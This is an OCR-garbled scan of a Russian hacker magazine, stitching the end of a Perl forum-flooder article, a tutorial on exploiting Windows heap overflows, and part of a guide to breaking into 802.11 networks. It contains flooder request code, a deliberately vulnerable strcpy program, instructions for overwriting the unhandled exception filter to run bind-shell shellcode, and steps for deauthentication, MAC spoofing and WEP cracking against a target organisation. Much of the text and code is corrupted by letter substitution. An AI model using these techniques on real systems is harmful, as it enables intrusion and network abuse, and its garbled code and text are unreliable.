НТТР::ВедиезІ(РОЗТ=>"$І_игІ?хІШе=$ШІе&розІісі=$Іор_ісі&ІорісІШе=$1 
оріс&хтзд=$тзд&Розі=Ро8Шокеп=$іокеп&тосІе=ЗиЬтіГ);#форми- 
руем запрос с ответом 

$соокіе_]аг ^асІсі_соокіе_[іеасІег($ІІоосІ_розІ);#опять цепляем куки 
$орега ^гедиезІ($ІІоосі_розІ);#выполняем запрос 

Если ты внимательно читаешь статью, у тебя должен возникнуть вопрос, 
что такое $*і*Іе $тзд и где они определяются. Все предельно просто — 
это название твоего ответа и его текст. Они находятся на нашем флуде- 
ре, и чтобы изменить их, воспользуйся любым текстовым редактором. 
Вот основной текст программы без функций: 

аиШ($аиМі_игІ); /функция авторизации 

Іог($п4);$п<$ІітІ;$п++){#$бтІ — количество постов, которые мы 
хотим отправить ( по умолчанию 50 ) 

ТІоосІ($гер_игІ); /функция для постинга наших флудерских "ответов" 
зІеер($сІеМіте); 

} 

Ты, наверное, заметил, что в конце цикла есть запись зІеер($сІе*_*іте). 
Сейчас я все объясню. Помнишь, я говорил, что скрипт ругнулся, что нуж- 
но подождать 1 минуту, когда я попытался оставить два поста подряд? То 
есть между постами должна быть пауза, определенная в переменной 
$беМіте . И хоть она по умолчанию равна 60 сек, можешь проиграть с 
этим значением, потому что скрипт нагло врал относительно 1 минуты — 
на самом деле достаточно 15 — 20 секунд (а может, и того меньше). 

[Ніе Іеззопз із оѵег. СоосІЬуе!] Ну вот собственно и все, что я хотел 
сказать по этому поводу. Только что мы с тобой рассмотрели основные 
аспекты зафлуживания в ѵѵеЬ и написали простенький академичный 
флудер. Надеюсь, ты его не будешь использовать даже в ознакомитель- 
ных целях, потому что сильно рискуешь попутно ознакомиться с сотруд- 
никами местного управления «Ку» :). Счастливо 0 





ищем скрытые поля 









Война еще не закончена, армии С 
Не подведи Дядю Сэма, офицер! 



жны новые пи 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕВРШМ НЬЮСЫ 




Куча с горкой 



ЕСЛИ ПОРЫТЬСЯ В СЕТИ, МОЖНО НАЙТИ ОГРОМНОЕ КОЛИЧЕСТВО МАТЕРИАЛОВ, ОПИСЫВАЮЩИХ РАЗ- 
ЛИЧНЫЕ МЕТОДЫ ВСЕВОЗМОЖНЫХ ПЕРЕПОЛНЕНИЙ. ПЕРЕПОЛНЕНИЯ В СТЕКЕ, ВІІРРЕВ ОѴЕВРЮѴѴ, РОВ- 
МАТ 5ТВІЫО — ВСЕ ЭТО В ДЕТАЛЯХ ОПИСАНО НА МНОГИХ САЙТАХ. ОДНАКО, ЕСЛИ ПРИСМОТРЕТЬСЯ, ПОЧ- 
ТИ ВСЕ ПРИМЕРЫ И ОПИСАНИЯ ПОПУЛЯРНЫХ МЕТОДИК ПРИВЕДЕНЫ ИМЕННО ДЛЯ ІІМІХ-СИСТЕМ. ЛЕЗТЬ 
В КУЧУ СПЕЦИФИЧЕСКИХ ДЛЯ ѴѴІЫООѴѴЗ МОМЕНТОВ НИКТО НЕ ЖЕЛАЕТ. ПО ЭТОЙ ПРИЧИНЕ МЫ РЕШИЛИ 
ПРИГОТОВИТЬ ДЛЯ ТЕБЯ ИНТЕРЕСНЫЙ МАТЕРИАЛ О ПОПУЛЯРНОМ СРЕДИ ХАКЕРОВ И ВИРМЕЙКЕРОВ 
ПРИЕМЕ, С ПОМОЩЬЮ КОТОРОГО РАСПРОСТРАНЯЕТСЯ ДОБРАЯ ПОЛОВИНА СЕТЕВЫХ ЧЕРВЕЙ, — О НЕАР 

ОѴЕВРЮѴѴ I Хаштамов Адиль (асііі @ок.кг) 



Основы Иеар-переполнений 
под ѴѴіпсІоѵѵз 

[что такое Неар] Прежде всего давай разберемся, что такое Неар. Любой 
школьник тебе скажет, что с английского это слово переводится как «куча». 
В нашем же компьютерном контексте слово «Неар» обозначает специаль- 
ную область зарезервированного адресного пространства, выделение и ос- 
вобождение памяти в котором реализуется при помощи специальных сис- 
темных функций. При работе с кучей программистам доступно собственное 
огромное виртуальное адресное пространство, по емкости значительно пре- 
восходящее объем реальной физической памяти, установленной в компью- 
тере. Все основные функции по работе с кучей (выделение, освобождение и 
создание блоков памяти) расположены в системной библиотеке пЙІІ.сІІІ. Из- 
начально каждому приложению в ѴѴіпсІоѵѵз выделяется одна мегабайтная ку- 
ча, а далее уже, по мере необходи- 
мости, объем выделяемой памяти 
автоматически увеличивается. В 
свою очередь, приложение может 
создавать собственное адресное 
пространство с помощью специаль- 
ных функций. Память в куче выделя- 
ется областями, причем в каждой об- 
ласти можно создать блоки памяти, 
которые будут расположены в сег- 
ментах. Для управления каждым та- 
ким блоком создается свой специ- 
альный заголовок, который изобра- 



рисунок 1 : заголовок блока 



Здесь Зіге обозначает размер бло- 
ка, Ргеѵіоиз Зіге — размер предыду- 
щего блока, Зедтепі Іпбех — индекс 
сегмента, в котором расположен 
блок, ІІпизесІ — количество неис- 
пользуемых байт в блоке, Тад Іпбех 
— индекс метки, а РІадз — флаг бло- 
ка. Флаги могут быть следующими: 

0x01 — НЕАР_ЕІ\ІТВУ_ВІІЗУ 
0x02 — НЕАР_ЕІ\ІТВУ_ЕХТВА_РВЕЗЕІ\ІТ 
0x04 — НЕАР_ЕІ\ІТВУ_РІІ_1__РАТТЕВІ\І 
0x08 — И ЕАР_ЕІ\ІТВУ_ѴІ ВТІІ АІ__АІ_І_0С 
0x10 — НЕАР_ЕІ\ІТВУ_І_А5Т_ЕІ\ІТВУ 
0x20 — И ЕАР_ЕІ\ІТВУ_5 ЕТТ АВ І_ Е_РІ_А6 1 
0x40 — НЕАР_ЕІ\ІТВУ_5ЕТТАВ1_Е_РІ_АС2 
0x80 — НЕАР_ЕІ\ІТВУ_5ЕТТАВІ_Е_РІ_АСЗ 

При освобождении блока памяти он принимает вид, изображенный на рисунке 2. 
Здесь РІіпк — указатель на следующий освобожденный блок, а ВІіпк — 
указатель на предыдущий освобожденный блок. 

[другая разметка] Для упрощения управления свободными блоками 
используется также разметка по количеству единиц выделения. Единицы 
можно высчитать таким образом. Объем каждого выделяемого блока па- 
мяти равен 8. К примеру, если приложение выделяет блок размером в 64 
байта, тогда единиц адресации получится 64/8 = 8. Каждая куча стартует 
со структуры из 128 массивов 1_13Т_ЕЫТВУ, которую можно посмотреть в 




рисунок 2: заголовок 
свободного блока 




т 



На нашем диске ты най- 
дешь полные версии прог- 
рамм, описанных в этой 
статье, подопытное прило- 
жение Зегѵег.ехе для экс- 
периментов и сплоит для 
программы — в ознакоми- 
тельных целях. 







ѵѵіппШѵѵіп.Гі. В каждый индекс массива записывается сво- 
бодный блок, нумерованный по единицам выделения. В на- 
шем примере мы выделили блок, равный 64 байтам, единиц 
выделения получилось 8. Выходит, что при освобождении 
блока памяти в массив РгееЫзІ (массив свободных блоков) 
под индексом 8 запишется наш освобожденный блок. Учти, 
что первый индекс РгееЫзІ не используется из-за того, что 
блок размером в 8 байт не может существовать. Нумерация 
индексов начинается с 2-х, нулевой индекс используется для 
хранения освобожденных блоков памяти более 1016 байт. 

[функции для работы с Неар] Теперь давай погово- 
рим о функциях для работы с кучей. Я опишу самые глав- 
ные системные вызовы: 

Щ Первая функция называется НеарСгеа1е(). Она служит 
для создания частной области памяти. У нее 3 параметра. 
Рассмотрим их: 

- Флаг кучи, всего их два. Первый флаг — НЕАР_ОЕЫЕН- 
АТЕ_ЕХСЕРТЮЫЗ — указывает на то, что в случае ошибки 
будет сгенерирована структура исключительных ситуаций 
(ЗЕН). Второй флаг — НЕАР_Г\Ю_ЗЕВІАІ_І2Е — указывает на 
то, что будет отменен синхронизированный доступ к памяти. 
Данную опцию стоит применять в том случае, если ты уверен, 
что доступ к куче не имеют одновременно два потока. 

- Размер кучи. 

- Размер максимального значения кучи. Если поставить 0, 
то будет стоять ограничение равное максимальному значе- 
нию всей виртуальной памяти системы (4Гб). 

Функция в качестве результата работы возвращает дескриптор, че- 
рез который в дальнейшем будет выделяться память. Чтобы тебе 
было проще, покажу на примере, как выглядит вызов этой функции: 




Описанная методика явля- 
ется платформозависимой 
и для каждой версии сис- 
темы нужно собирать свой 
сплоит, указывая различ- 
ные адреса фильтров. 




Количество выделяемой 
памяти в куче указывается 
в РЕ-заголовке экзешника 
и может быть изменено. 
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Эта статься написана в ис- 
следовательских целях для 
ознакомления с растущей 
угрозой со стороны сете- 
вых червей: ведь остано- 
вить продвижение заразы 
можно лишь, как следует 
разобравшись с тем, как 
она распространяется. За 
незаконное применение 
полученных сведений не- 
сешь ответственность 
только ты сам. 



мы имеем дело с кучей, а не со сте- 
ком :). Чтобы не вести абстрактных 
разговоров, приведу распростра- 
ненный пример уязвимой програм- 
мы. Всмотрись-ка в этот код: 

[уязвимый код программы] 



НАІ\ЮІ_Е Неарі = НеарСгеаге(НЕАР_8ЕЫЕВАТЕ_ЕХСЕР- 
ТІ0ІМ5, 700, 0); 

\2\ Вторая функция используется для выделения блоков и 
называется НеарАІІос(). Она имеет 3 параметра: 

- Дескриптор области кучи (в нашем случае это Неарі). 

- Необязательные флаги, два из которых аналогичны функ- 
ции НеарСгеа1е(), а третий флаг — НЕАР_2ЕВО_МЕМОВѴ — 
указывает на то, что выделенный блок заполняется нулями. 

- Объем запрашиваемой памяти. Пример вызова: 

сИаг *НеарВІоск1 = НеарАІІос(Неар1, НЕАР_2ЕВ0_МЕМ0ВУ, 555); 

Ш Третья функция — освобождение блока НеарРгее(). Она 
имеет тоже 3 параметра. 

- Дескриптор области. 

- Флаг. Может быть 0 или НЕАР_І\Ю_ЗЕВІАІ_І2Е. 

- Блок, который нужно освободить. 

Я рассказал тебе об основных функциях для работы с кучей 
в ѴѴіпсІоѵѵз. Понимание их работы уже очень скоро нам при- 
годится, потому что переходим к самому интересному — не- 
посредственно к Неар ОѵегІІоѵѵ. 



[переполнение кучи] Переполнение кучи схоже с пере- 
полнением стека. Отличительная особенность, как и следо- 
вало бы ожидать, заключается в том, что в данном случае 




#іпсІис!е <зісііо.іі> 

#іпсІис!е < ѵѵіпсІоѵѵз. Іі> 

іпі таіп ( іпі агдс, сііаг *агдѵ[] ) 

{ 

НАІ\ЮІ_Е Неарі = НеарСгеа1е(0, 
700, 0); 

сііаг* ІіЫоскІ = НеарАІІос(Неар1, 
НЕАР_2ЕВ0_МЕМ0ВѴ, 10); 
5Ігсру(ІіЫоск1, агдѵ[1 ]); 
сііаг* ІіЫоск2 = НеарАІІос(Неар1, 
НЕАР_2ЕВ0_МЕМ0ВѴ, 20); 
НеарРгее(Неар1, 0, ІіЫоскІ); 
НеарРгее(Неар1, 0, ІіЫоск2); 
геіигп 0; } 

Если ты внимательный человек и 
немного смыслишь в программи- 
ровании, то мигом заметишь, что в 
этой программе присутствует баг 

— переполнение при использова- 
нии функции з1гсру(). При копиро- 
вании мы не учитываем длину 
входного параметра, который ко- 
пируется в первый блок. Если 
ввести достаточно длинную стро- 
ку, то когда данные переполнят 
первый блок, мы уже попадем во 
владения второго блока и будем 
иметь возможность управлять им. 
Это можно наглядно увидеть в лю- 
бом отладчике, я буду использо- 
вать известный дебаггер ОІІуЭЬд. 
Посмотри на скриншот под номе- 
ром три. Там отчетливо видно, что 
происходит при переполнении ку- 
чи. Неар ОѵегІІоѵѵ произошел при 
освобождении блоков памяти, и те- 
перь управляем двумя регистрами 

— ЕАХ и ЕСХ. Обрати внимание на 
этот участок кода в отладчике: 

МОѴ 0ѴѴ0РЮ РТР 03:[ЕСХ],ЕАХ 
МОѴ 0ѴѴ0РЮ РТР 05:[ЕАХ+4],ЕСХ 










Эти строки и означают то, что у нас в распоряжении вышеприведен- 
ные регистры. Если ты понял всю технику работы кучи, то уже мо- 
жешь догадаться, что в регистр ЕАХ при нормальной работе будет 
занесен адрес следующего свободного блока, а в регистр ЕСХ — ад- 
рес предыдущего. При переполнении мы затерли значения этих ре- 
гистров, и поэтому происходит ошибка. Эксплуатирование может 
идти по сценарию подмены РІіпк и ВІіпк. В данной статье я хочу рас- 
сказать об одной из самых легких техник — о перезаписывании 
фильтра необработанных исключений (ІІпПапсІІесІ Ехсерііоп РіІІег). 
Функция, которая устанавливает этот фильтр, находится в систем- 
ной библиотеке кегпеІ32.сІІІ — ЗеШпНапсІІесІЕхсерІіопРіІІег. Код ее 
выглядит примерно так: 

тоѵ есх, сіѵѵогсі ріг [езр+04] 
тоѵ еах, сіѵѵогсі ріг [77ЕЭ73В4] 
тоѵ сіѵѵогсі ріг [77ЕЭ73В4], есх 
геі 0004 

Для выполнения кода нам достаточно установить в регистр ЕСХ адрес 
фильтра (77ЕЭ73В4), а в регистр ЕАХ — адрес, который передаст уп- 
равление шелл-коду. 

Тем самым после этого будет выполнен следующий код: 

пМІІ.ШиегуІпІогтаІіопРгосезз: 

тоѵ еах, сіѵѵогсі ріг [77ЕЭ73В4] 

стр еах, езі 

]е 77Е93132 

ризіі есіі 

саІІ еах 



Здесь видно, что управление будет передано этому фильтру. И при под- 
мене фильтра мы сможем передать управление нашему шелл-коду. У 
внимательного читателя, наверное, уже назрел вопрос о том, каким об- 
разом можно узнать адрес шелл-кода. Тут все просто. Дело в том, что 
регистр ЕЭІ+0х74 указывает на стек перед кучей. Таким образом, при 
перезаписи фильтра этим адресом мы передаем управление на заранее 
подготовленный шелл-код. 

Давай все это рассмотрим на практике. В качестве подопытного кро- 
лика я написал маленькое серверное приложение, которое принимает 
запросы от клиента. При посылке запроса, который превышает размер 
отведенного буфера, сервер отрубается с ошибкой переполнения. За- 
дача клиента-эксплойта заключается в том, чтобы послать специаль- 
ным образом сформированный запрос, который переполнит кучу, вы- 
зовет необработанное исключе- 
ние, подменит его и передаст уп- 
равление шелл-коду, который, в 
свою очередь, откроет шелл на 
28876 порту. Вот и все. Чтобы 
лучше понимать, о чем я говорю, 
настоятельно советую тебе взять 
с нашего диска исходник сервера 
и параллельно со мной проделы- 
вать все операции над выполняе- 
мым бинарником в отладчике. 
Загрузи в ОІІуЭЬд Зегѵег.ехе с 
диска и передай программе на 




рисунок 5: удачная работа 






ЗеШпІпапсІІесІЕхсерІіопРіІІег в кегпеІ32.сІІІ 



вход достаточно длинную строку. В отладчике ты увидишь картинку, 
очень похожую на рисунок 4. 

Как видно из скрина, сервер упал и значения ЕАХ, ЕСХ подменились 
на 0x6161 6161. Это говорит о том, что мы в состоянии удачно выпол- 
нить код. Сам эксплойт, который будет открывать доступ к шелл-обо- 
лочке, очень прост для понимания, и ты его можешь наблюдать на 
нашем диске. В нем я использую ѵѵіпзоск для соединения с сервером 
(у нас он висит на 6666 порту). При подключении на него эксплойт 
формирует строку для переполнения. Для этого мы заполняем выде- 
ляемый в программе буфер, организуя короткий переход ігтірз, пере- 
дающий управление фильтру, который после этого перезаписывает- 
ся инструкцией саІІ сіѵѵогсі ріг [есІі+0х74]. Эта инструкция в нашем слу- 
чае взята из библиотеки ВРСВТ4.ЭІ_І_. Управление переходит на 
«пустышки» (ІМОР'ы), которые спускаются до нашего шелл-кода, ко- 
торый и исполняется серверной частью. Шелл-код работает по сле- 
дующему принципу. В самом начале по структуре ѵѵіпзоск мы откры- 
ваем 28876 порт на машине. Далее создаем процесс стб.ехе с по- 
мощью Сгеа1еРгоссезз(), который «вешается» на вышеуказанный 
порт, поэтому при подключении на него, ты получаешь интерактив- 
ную командную строку. Для более ясного понимания работы сплоита 
советую тебе запустить сервер вне отладчика, а потом «прикрепить- 
ся» к нему с помощью ОІІуЭЬд. Все эти действия можно наблюдать на 
картинке под номером 5. 

Как видно, все наши теоретические прикидки и расчеты реализовались 
на практике, мы перезаписали фильтр, наш код исполнился удачно, и на 
28786 порту открылся гейт для доступа к стсі.ехе :). 

[заключение] В данной статье я лишь показал основу для даль- 
нейшего изучения. Рассмотренная нами техника, считается самой 
легкой и процент того, что код выполнится при правильно собран- 
ном эксплойте, очень велик. Однако у методики есть и серьезный 
недостаток: она платформозависима. То есть для каждой ОС и ЗР 
нужно искать свои адреса фильтров. Возможно, в последующих 
статьях я рассмотрю другие техники, которые не зависят от плат- 
формы и на основе которых можно будет писать универсальные 
эксплойты © 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




ѴѴі-Рі под скальпелем 



В ДАЛЕКОМ 2002 ГОДУ УЧАСТНИКИ БЕРСОМ ПРОВЕЛИ НЕБОЛЬШОЕ ИССЛЕДОВАНИЕ, БОЛЬШЕ ПОХОДИВШЕЕ 
НА СПОРТИВНОЕ СОРЕВНОВАНИЕ ПО ПРОНИКНОВЕНИЮ В БЕСПРОВОДНЫЕ СЕТИ. ИЗУЧИВ БОЛЕЕ 500 ТО- 
ЧЕК ДОСТУПА В ОКРУГЕ, ОНИ ВЫЯВИЛИ ИНТЕРЕСНУЮ СТАТИСТИКУ: ОКОЛО 30% БЕСПРОВОДНЫХ СЕТЕЙ 
ЗАЩИЩАЛИСЬ ПРОТОКОЛОМ ѴѴЕР, В КАЖДОЙ ПЯТОЙ СЕТКЕ ЗНАЧЕНИЕ ЕЗЗЮ БЫЛО ВЫСТАВЛЕНО «ПО 
УМОЛЧАНИЮ», А 20% БЕСПРОВОДНЫХ СЕТЕЙ АБСОЛЮТНО НИКАК НЕ ЗАЩИЩАЛИСЬ ОТ ДОСТУПА ИЗВНЕ. 
МОГУ ТЕБЕ СКАЗАТЬ, ЧТО В НАСТОЯЩЕЕ ВРЕМЯ НА ТЕРРИТОРИИ РОССИИ СТАТИСТИКА ЕЩЕ БОЛЕЕ УЖАСА- 
ЮЩАЯ. ТОЛЬКО КАЖДАЯ ДЕСЯТАЯ 802.11 СЕТЬ ЗАЩИЩЕНА ЧЕМ-ТО БОЛЬШИМ, ЧЕМ ПРОТОКОЛ ѴѴЕР И 
ФИЛЬТРАЦИЯ МАС-АДРЕСОВ. НУ А РАЗ ТАК, ЕСТЬ ПОВОД ДЛЯ РАЗГОВОРА I гоззотаіпааг (гоззотаІпааг@ таіі.ги) 



Позитивный опыт проникновения 
в беспроводные 802.11 сети 

[готовимся к атаке] Из приведенной статистики легко понять, что, 
имея ноутбук, кое-какие программы и немного знаний, можно проник- 
нуть в 90% сетей 802.11. А если взломщик обладает более глубокими 
знаниями по беспроводным сетям и некоторыми хакерскими навыками 
(социальной инженерией, например), процент удачных проникновений 
стремится к 100. Мы уже писали о взломе ѴѴі-Рі, но сегодня мы 
посмотрим на хакерский опыт в этом вопросе с практической стороны. 

[что нужно] Для ѴѴі-Рі-хакинга взломщики пользуются следующими 
атрибутами жизни: 

- ноутбук 

- ѴѴі-Рі-карта с набором микросхем Ргізт2 (в принципе, можно работать 
и с другими, например, Негтез, но лучше все же Ргізт, так как под та- 
кие карты пишется большинство необходимого нам софта) и с возмож- 
ностью подключения внешней антенны 

- антенна, а лучше две: всенаправленная и узконаправленная; 

- автомобиль 

Ну, это в идеале. Разумеется, большинство людей не может поставить по плюси- 
ку рядом с каждым пунктом. Поэтому может подойти и такой вариант: ноутбук со 
встроенным модулем ѴѴі-Рі и две ноги. Или еще один вариант: домашний комп, 
позаимствованная у друга карта и присоединенная к ней, наспех сделанная сво- 
ими руками направленная антенна, которая с балкона нацеливается на офис ка- 
кой-нибудь находящейся неподалеку фирмы. Не стоит также недооценивать воз- 
можности КПК, поэтому если у тебя есть наладонник с ѴѴі-Рі-модулем (желатель- 
но іРас или 2аишз), то он может весьма пригодиться. 

Какую ось выбрать для этого дела? В статье Укр-Хыра был упор на 
ѴѴіпсІоѵѵз, поэтому я расскажу о программах под юникс. Тем более, что 
они бесплатные и дают больше возможностей. 



[выбор цели] О том, как найти в центре города незащищенную сеть и 
посидеть нахаляву в инете, мы уже писали, и нам это сейчас не особен- 
но интересно. Рассмотрим другой вариант: хакеру нужно проникнуть в 
конкретную беспроводную сеть определенной организации. Он не зна- 
ет, насколько хорошо она защищена, с чего же начать? 

Первое, что необходимо предпринять — провести интернет-разведку. 
Нужно узнать как можно больше о том, кто занимается вопросами ИТ в 
организации, как они этим занимаются, то есть накопить как можно 
больше информации о своем противнике. Зачем это может пригодить- 
ся? Во-первых, можно нарыть кучу полезной для себя информации, ка- 
сающейся используемых фирмой технологий защиты. Во-вторых, зна- 
ние имен должностных лиц компании может пригодиться при использо- 
вании социнженерии. 

Далее следует осмотр местности. Взломщик выявляет наиболее удоб- 
ное место для атаки. Бывает так, что сеть никак не защищена, но при- 
соединиться к ней можно только, когда находишься в непосредственной 
близости от нее. В этом случае хакеру понадобится мощная остронап- 
равленная антенна. Можно также пойти на более экстремальные 
действия: под каким-нибудь предлогом проникнуть внутрь здания и со- 
вершить взлом «изнутри», но в этом случае нужно сделать все «по-ти- 
хому», так как возможно наличие системы ЮЗ. 

[изучаем трафик] Я расскажу тебе о нескольких программах для об- 
наружения сетей и анализа их трафика. Вообще, существует два способа 
обнаружения беспроводных сетей: метод активного и пассивного скани- 
рования. Активное сканирование подразумевает отправку АР пробного 
запроса в надежде получить от точки ответ, в котором будет содержать- 
ся информация о ЕЗЗЮ, канале передачи данных, применяемом шифро- 
вании данных, уровне сигнала и скорости передачи данных. Именно так 
действуют ІМеіЗіитЫег и МіпіЗіитЫег. Проблема в том, что админ легко 
может настроить точку доступа так, что она не будет отвечать на подоб- 
ные запросы и станет невидимой для ЫеіЗіитЫег'а. Кроме того, сигнатур- 
ные ЮЗ выявляют сканирование Нетстамблером, так что ты можешь 
привлечь к себе внимание, используя его. Еще один трюк, который может 




предпринять админ — 
это посылка поддель- 
ного фрейма-ответа с 
заведомо ложными 
данными на твой 
фрейм-запрос, чтобы 
ввести тебя в заблуж- 
дение. Это можно реа- 
лизовать, например, с 
помощью проги 

РіІе2Аіг, написанной 
Джошуа Райтом 

^озПиа ѴѴгідПІ). Еще 
один минус активного 
сканирования — это высокий расход заряда аккумулятора. 
Пассивное сканирование использует режим мониторинга 
ѴѴі-Рі-карты. Оно состоит в перехвате трафика, проходя- 
щего по всем каналам. Лучшим инструментом для пас- 
сивного сканирования, по моему мнению, является 
Кізтеі, созданный Майком Киршоу (Міке КегзІіаѵѵ). По-су- 
ти, эта прога предназначена для анализа трафика ѴѴі-Рі и 
создания систем Ю8. Кізтеі поддерживает все карты, 
умеющие работать в режиме гітоп, ее можно поставить 
на І_іпих, в том числе на дистрибутивы для КПК, РгееВЗО 
и ОрепВЗО, МасОЗХ (и даже на винду с помощью 
Судѵѵіп'а). Найти последнюю версию Кізтеі можно на сай- 
те ѵѵѵѵѵѵ.кізтеШігеІезз.пеІ. Прежде, чем собирать Кізтеі 
настоятельно рекомендую тебе обзавестись (если у тебя 
его нет) ЕЛпегпаГом, который пригодится для изучения 
дампов, сформированных Кізтеі'ом. Если у тебя есть 
ОРЗ-приемник, то тогда неплохо установить еще и 
ОрзОгіѵе, интегрирующий с Кізтеі с ним. Компиляция 
Кізтеі весьма проста и не должна вызвать каких-либо 
сложностей. Если будет что-то непонятно, то прочитай 
ВЕАОМЕ, там все очень подробно расписано. 







в гугле полно информации о ра- 
боте с кізтеі 




просмотр дампа Кізтеі с помощью ЕІНегпаІ 



Для настройки Кізтеі под наши нужды откры- 
ваем /изг/іосаі/еіс/кізтеі. со пі. Здесь нужно сде- 
лать несколько вещей: 

- отключить фильтрацию МАС-адресов 

- разрешить устанавливать соединения с ІР 
127.0.0.1 

- выставить тахсііепі равным 1 

- установить в значение зоигсе источник пе- 
рехватываемых данных 

- настроить интервал между операциями записи 

- установить параметры поізеіод и Ьеасопіод в 
значение Іаізе 

- наделить правами запуска Кізтеі пользо- 
вателя, под которым ты обычно работаешь, 
если, конечно, не собираешься работать под 
рутом. 

- если необходимо, настроить ОРЗ 




т 



т 



Следует понимать, что пра- 
вовая оценка взлома бесп- 
роводных сетей мало от- 
личается отхака обыкно- 
венных. Все это наказыва- 
ется УК твоей страны. Так 
что не следует нарушать 
законов, приятель. 

В одном из ближайших но- 
меров тебя ждет интерес- 
ная статья о защите И Н-П, 
организации Ю5 и проти- 
востоянии воздушных ха- 
керам. Не пропусти! 

На нашем диске ты най- 
дешь весь софт, который 
был упомянут в этой 
статье. 



Теперь о том, какими полезными умениями об- 
ладает эта прога. Во-первых, она выводит ин- 
формацию о том, что точка доступа имеет конфигурацию «по умолчанию», вылавли- 
вает пробные запросы «затерявшихся» хостов, а также пробные запросы Нетстамб- 
лера, может «на лету» расшифровывать пакеты, если задать правильный ѴѴЕР, а в 
случае обнаружения ІР-адресов, определяет, какой протокол применяется для их 
распознания (АВР, ТОР, ІЮР или ЭНСР). Во-вторых, она генерирует дампы в фор- 
мате рсар, что позволяет просматривать их затем с помощью анализатора сетевых 
протоколов ЕІНегпаІ. 

Существует еще множество программ, умеющих обнаруживать беспроводные сети 
стандарта 802.11, среди них я бы выделил такие инструменты, как Аігіагі и консоль- 
ную тулзу ѴѴіІіЗсаппег. Обе эти программы работают только на картах с набором 
микросхем Ргізт и нуждаются в дровах Ііпих-ѵѵіап-пд. 



[обходим барьеры] Простейшая защита сети ѴѴі-Рі от незаконного вторжения 
может осуществляться с помощью таких методов, как: скрытие ЕЗЗЮ-сети от пос- 
торонних глаз, фильтрация МАС-адресов и фильтрация протоколов. Давай посмот- 
рим, что мы можем противопоставить этому. 

Если сеть закрытая, то ее ЕЗЗЮ (Ехіепбесі Зегѵісе Зеі Ю — служебный идентифика- 
тор сети) не фигурирует в циркулирующих в 
ней фреймах. Не зная ЕЗЗЮ-сети, взломщик 
не может присоединиться к ней. На самом деле 
ЕЗЗЮ присутствует в запросах на повторную 
аутентификацию и повторное присоединение, 
а, значит, можно узнать ЕЗЗЮ, послав под- 
дельный фрейм деаутентификации хосту от 
МАС-адреса точки доступа. Затем нужно пе- 
рехватить фрейм, посылаемый хостом, содер- 
жащий интересующий нас ЕЗЗЮ. Реализовать 
это легко можно с помощью утилиты 
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результат работы Аігсгаск 




иксовая версия кізтеі в Опоте 



еззісЦаск, содержа- 
щейся в комплекте 
программ Аіг^аск. В 
своей статье о ЭоЗ- 
атаках в сетях ѴѴі-Рі я 
уже писал об 
Аі^Іаск'е, поэтому не 
буду заострять здесь 
на нем внимания. 
Возможен такой вари- 
ант событий, когда 
точка доступа одна, и 
нет в настоящий момент взаимо- 
действующих с ней хостов. В этом 
случае остается опробовать вари- 
ант Е55Ю, характерный для наст- 
роек «по умолчанию» производи- 
теля данной точки доступа. Неко- 
торые админы, закрыв сеть, даже 
не подумывают изменить их значе- 
ния. 

Фильтрация МАС-адресов вообще 
обходится проще простого. Нужно 
изучить трафик на предмет встре- 



чающихся МАС-адресов, и когда какой-нибудь хост отсоединится от се- 
ти, можно присоединится к ней, установив себе такой же МАО. Если 
ждать отсоединения хоста не хочется, то можно выкинуть этот хост из 
сети, задосив его :). 

Фильтрация протоколов применяется намного реже, чем фильтрация 
МАС-адресов и скрытие Е53Ю, так как это не всегда удобно для рабо- 
ты в сети и не во всех точках доступа можно нормально использовать 
ее. Если ты столкнулся с такой сетью, то могу тебе посоветовать испы- 
тать на предмет наличия уязвимостей разрешенные в сети протоколы. 
Обычно такими протоколами являются ЗЗН и НТТРЗ. Если используют- 
ся устаревшие версии протоколов, то наверняка в них есть дыры, кото- 
рые можно проэксплуатировать. Кроме того, весьма полезной может 
оказаться техника атак Мап-іп-ІИе-МісІсІІе. 



[уделаем ѴѴЕР] Про взлом протокола ѴѴЕР написано уже столько, что 
создается ощущение, что это чуть ли не единственная и самая главная 
защита беспроводных сетей от вторжений, и что на этом ограничивают- 
ся средства безопасности сетей ѴѴі-Рі. Что ж, судя по статистике, это вер- 
но в каждом третьем случае. Выделяют несколько видов атак на ѴѴЕР: 



- атака методом полного перебора — возможен подбор только 40-бит- 
ного ключа (в ѴѴЕР применяются 64-х и 128-ми 256-ти 512-битные клю- 
чи, но так как первые 24 бита занимает так называемый вектор иници- 
ализации (IV), передающийся в открытом виде, то можно говорить, что 
длина ключей составляет 40 и 104 и т.д. бита), но такая атака может за- 
нять довольно продолжительное время, а потому неэффективна 

- атака по словарю — может осуществляться против одного перехва- 
ченного пакета, она реализована в проге ѴѴераКаск; в отличие от атаки 
методом полного перебора, возможна расшифровка 104-битного ключа 

- атаки методом полного перебора, с использованием оптимизирую- 
щих алгоритмов, — могут сократить время полного перебора 40-битно- 
го ключа с нескольких недель до половины минуты, но это при удачном 
для хакера раскладе, а в целом эти атаки также неэффективны (64-бит- 
ное шифрование встречается очень редко) 

- атака РМЗ — имеет очень интересный механизм, позволяющий при 
наличии 6 — 8 млн. пакетов определить значение ѴѴЕР 

- оптимизированные атаки РМЗ — например, хакер Нікагі сумел опти- 
мизировать алгоритм РМЗ так, что количество необходимых пакетов 
сократилось до 500 тысяч 

- другие атаки — сюда можно включить различные вспомогательные 
атаки, например, внедрение трафика для ускорения процесса сбора не- 
обходимого количества пакетов. 



В реальности количество необходимых для взлома ѴѴЕР перехва- 
ченных фреймах может колебаться в весьма широких пределах, но 
обычно это 1,5 — 2 млн. пакетов. 

На сегодняшний день проги, взламывающие ѴѴЕР, используют, в основ- 
ном, так называемую атаку по методу Флуера-Мантина-Шамира или 
атаку РМЗ, разработанную в 2001 году Скоттом Флуером (Зсои РІиІігег), 
Ициком Мантином (Іізік Мапііп) и Ади Шамиром (Абі ЗНатіг), плюс раз- 
личные, оптимизирующие эту атаку, алгоритмы. Одной из лучших прог- 
рамм для взлома ѴѴЕР является на сегодня Аігсгаск. Помимо атаки РМЗ, 
она использует также несколько новых видов атак, разработанных хаке- 



ром КогеК. Для взлома ѴѴЕР нужно скормить Аігсгаск'у файл с перехва- 
ченными пакетами в формате рсар. 

В сетях с низким трафиком процесс сбора пакетов может весьма затя- 
